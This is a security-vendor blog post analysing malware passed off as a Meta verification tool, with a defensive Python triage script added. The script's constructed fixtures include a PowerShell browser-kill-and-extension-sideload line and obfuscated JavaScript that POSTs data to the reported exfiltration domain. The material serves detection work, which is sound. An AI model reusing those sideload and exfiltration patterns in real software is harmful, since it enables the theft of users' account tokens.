Unmasking Deception: Malware Disguised as Meta Verification Tool
Social media scams have become an unfortunate reality, with malicious individuals and hackers constantly devising new tactics to exploit users' private data. In a disturbing development, fake Meta accounts have emerged as impostors, cunningly posing as the renowned social media giant. Their deceptive aim? To lure unsuspecting users into downloading counterfeit tools through fraudulent accounts, meticulously replicating Meta's appearance, complete with verified ticks on their profiles. Unbeknownst to the victims, these seemingly innocent downloads contain malware capable of infiltrating devices, allowing scammers to gain unauthorized access to users' social media accounts, granting them the ability to disseminate spam or unleash malicious content.
Meta Verified is a comprehensive subscription verification program designed for Instagram and Facebook, offering a range of additional benefits such as live chat customer support and protection against account impersonation.
On October 29, 2023, researchers at Nexusguard came across a Facebook ad from a sponsored page that falsely claimed to offer a tool to help account owners obtain verification. The post shown in the ad included a download link and the password needed to extract the downloaded archive.
The advertisement was shared on a compromised Facebook page, boasting a staggering 1.5 million followers at present.
Using Facebook's Page Transparency feature, our team found that the page in question was created on November 28, 2008.
Upon closer examination, it became evident that the page was managed by two administrators, with one administrator residing in the United States, and the other based in Vietnam.
Visiting the advertised website automatically downloads a RAR archive named "AI Page verification version 1.0.4.rar". Once downloaded, the archive is extracted using the password supplied in the advertised post.
Initial scans flagged the file as malicious, with 17 of 61 detection engines identifying it.
To gain deeper insight into the malware, we performed a dynamic analysis, executing the malicious software inside an isolated virtualized environment.
On execution, the file created a number of files in the directory C:\Program Files\Google\Install\nmmhkkegccagdldgiimedpic\.
Following the creation of the files illustrated in Figure 8, the malware proceeded to execute ru.ps1, an intriguing PowerShell script. The contents of the PowerShell script are presented below for analysis and understanding.
The PowerShell script terminates Google Chrome, Microsoft Edge and Brave, then installs a browser extension disguised as "Google Translate". The familiar name lets the extension conceal its true purpose.
Decoding the Malicious Extension
The malware's primary objective is to covertly install a malicious extension in Google Chrome, masquerading as the genuine Google Translate extension.
As shown in the example above, the background.js file is deliberately obfuscated, a clear indicator of its malicious nature.
The captured data, comprising the victims' Facebook tokens and IP addresses, is subsequently transmitted to hxxps[:]//managevds.com.
Upon conducting a thorough Google search on the domain managevds.com, we discovered that it has been blacklisted as a phishing website, indicating its malicious intent and potential threats it poses to users.
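The behaviour described above gives a defender three concrete things to look for: a script that kills several browsers and then sideloads an extension, an extension with a trusted brand name running from outside the browser's own Extensions folder, and a background.js whose identifiers are machine-generated and whose string literals decode to the exfiltration host. The following triage helper is an added example written for this article, not code from Nexusguard or from the malware. Only the browser names, the staging directory, the impersonated extension name and the domain managevds.com come from the report; the script-block text, manifest and background.js it runs on are constructed fixtures (the real ru.ps1 is not reproduced here), and the use of Chromium's --load-extension switch as the sideload indicator is an assumption about how such a script would install the extension.

```python
import base64
import re
from dataclasses import dataclass

# Indicators taken from the report: the browsers the script terminates, the
# directory the dropper populates, the impersonated extension name and the
# exfiltration domain.  Everything marked "constructed" below is made up.
KILLED_BROWSERS = {"chrome", "msedge", "brave"}
STAGING_DIR = r"C:\Program Files\Google\Install\nmmhkkegccagdldgiimedpic"
IMPERSONATED_NAMES = {"google translate"}
EXFIL_DOMAINS = {"managevds.com"}


@dataclass(frozen=True)
class Finding:
    rule: str
    evidence: str


def scan_scriptblock(text: str) -> list[Finding]:
    """Flag script-block text (e.g. from Windows event 4104) that terminates
    two or more browsers and sideloads an extension, or that references the
    staging directory from the report."""
    low = text.lower()
    findings = []
    killed = sorted(b for b in KILLED_BROWSERS if re.search(rf"\b{b}\b", low))
    kills = re.search(r"stop-process|taskkill", low) is not None and len(killed) >= 2
    sideloads = "--load-extension" in low  # assumption: Chromium sideload switch
    if kills and sideloads:
        findings.append(Finding("browser_kill_then_sideload", ",".join(killed)))
    if STAGING_DIR.lower() in low:
        findings.append(Finding("known_staging_dir", STAGING_DIR))
    return findings


HEX_IDENT = re.compile(r"\b_0x[0-9a-f]{3,}\b")          # javascript-obfuscator style names
STRING_LIT = re.compile(r"'([^'\\]*)'|\"([^\"\\]*)\"")
IDENT = re.compile(r"\b[A-Za-z_][A-Za-z0-9_]*\b")
B64 = re.compile(r"[A-Za-z0-9+/]+=*")


def obfuscation_score(js: str) -> float:
    """Fraction of identifiers that look machine-generated, measured with string
    literals blanked out so encoded payloads are not counted as identifiers."""
    code = STRING_LIT.sub("''", js)
    idents = IDENT.findall(code)
    return len(HEX_IDENT.findall(code)) / len(idents) if idents else 0.0


def decode_literals(js: str) -> list[str]:
    """Base64-decode every quoted literal that yields printable ASCII; hard-coded
    exfiltration hosts in obfuscated extensions usually surface here."""
    out = []
    for m in STRING_LIT.finditer(js):
        lit = m.group(1) or m.group(2) or ""
        if len(lit) < 8 or len(lit) % 4 or not B64.fullmatch(lit):
            continue
        try:
            plain = base64.b64decode(lit, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if plain.isprintable():
            out.append(plain)
    return out


def triage_extension(install_path: str, manifest: dict, background_js: str) -> list[Finding]:
    """Combine install location, manifest name and background.js heuristics."""
    findings = []
    # Chrome Web Store installs live under <profile>\Extensions\<id>\<version>;
    # an extension running from anywhere else was sideloaded.
    sideloaded = "\\extensions\\" not in install_path.lower()
    if sideloaded and manifest.get("name", "").strip().lower() in IMPERSONATED_NAMES:
        findings.append(Finding("sideloaded_brand_impersonation", manifest["name"]))
    score = obfuscation_score(background_js)
    if score >= 0.4:
        findings.append(Finding("obfuscated_background_js", f"{score:.2f}"))
    for plain in decode_literals(background_js):
        if any(dom in plain for dom in EXFIL_DOMAINS):
            findings.append(Finding("exfil_domain_in_decoded_literal", plain))
    return findings


# Constructed fixtures: a script block shaped like what Script Block Logging
# records, and a minimal fake "Google Translate" extension.  Not the real samples.
SAMPLE_SCRIPTBLOCK = (
    "Stop-Process -Name chrome,msedge,brave -Force -ErrorAction SilentlyContinue\n"
    "Start-Process chrome.exe -ArgumentList '--load-extension=" + STAGING_DIR + "\\ext'\n"
)
SAMPLE_PATH = STAGING_DIR + "\\ext"
SAMPLE_MANIFEST = {"name": "Google Translate", "manifest_version": 3, "version": "1.0",
                   "background": {"service_worker": "background.js"}}
SAMPLE_BACKGROUND_JS = (
    "var _0x1a2b=['aHR0cHM6Ly9tYW5hZ2V2ZHMuY29tL2FwaQ==','ZmFjZWJvb2suY29t'];"
    "function _0x3c4d(_0x5e6f){return atob(_0x1a2b[_0x5e6f]);}"
    "fetch(_0x3c4d(0),{method:'POST',body:_0x3c4d(1)});"
)

if __name__ == "__main__":
    for f in scan_scriptblock(SAMPLE_SCRIPTBLOCK) + triage_extension(
            SAMPLE_PATH, SAMPLE_MANIFEST, SAMPLE_BACKGROUND_JS):
        print(f"{f.rule}: {f.evidence}")
```

Run against the fixtures, the script-block scan reports the browser-kill-then-sideload pattern and the staging directory, and the extension triage reports the sideloaded brand impersonation, an obfuscation score of 0.50 and the decoded managevds.com URL. The thresholds are heuristics for analyst review, not verdicts; a legitimately minified extension can score highly on the identifier test, which is why the install location and the decoded literals are checked alongside it.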
Our findings underscore the grave reality of perpetrators exploiting social engineering techniques to capitalize on the unwavering trust users place in popular social networking platforms. It is crucial for users to grasp the fact that appearances can be deceiving, even when dealing with seemingly legitimate services. As cybercriminals continue to refine their tactics with alarming sophistication, users must maintain constant vigilance, stay well-informed, and proactively adopt measures to protect their personal information and fortify their online identity.
Furthermore, it is advised to refrain from downloading any files or clicking on links within paid advertisements until Meta takes effective measures to address and resolve this issue. Engaging with such content could potentially expose users to various risks, including malware, unauthorized access, or other malicious activities. It is strongly recommended to exercise vigilance and avoid interacting with suspicious or unverified links within paid advertisements on Meta. Keep a watchful eye for any official updates or announcements from Meta regarding the resolution of this problem.
Nexusguard, renowned for its resolute commitment to cybersecurity, goes beyond mere threat intelligence development through meticulous data gathering and analysis. Our comprehensive suite of web and network application security solutions stands as a formidable defense, proficiently detecting and obstructing malicious traffic, including those targeting Facebook ads. By leveraging our proactive measures, organizations gain a distinct advantage in staying ahead of the ever-evolving threat landscape, promptly identifying emerging attack techniques before they proliferate.
For uninterrupted visibility into your cyber risk and to explore our comprehensive offerings, visit Nexusguard today.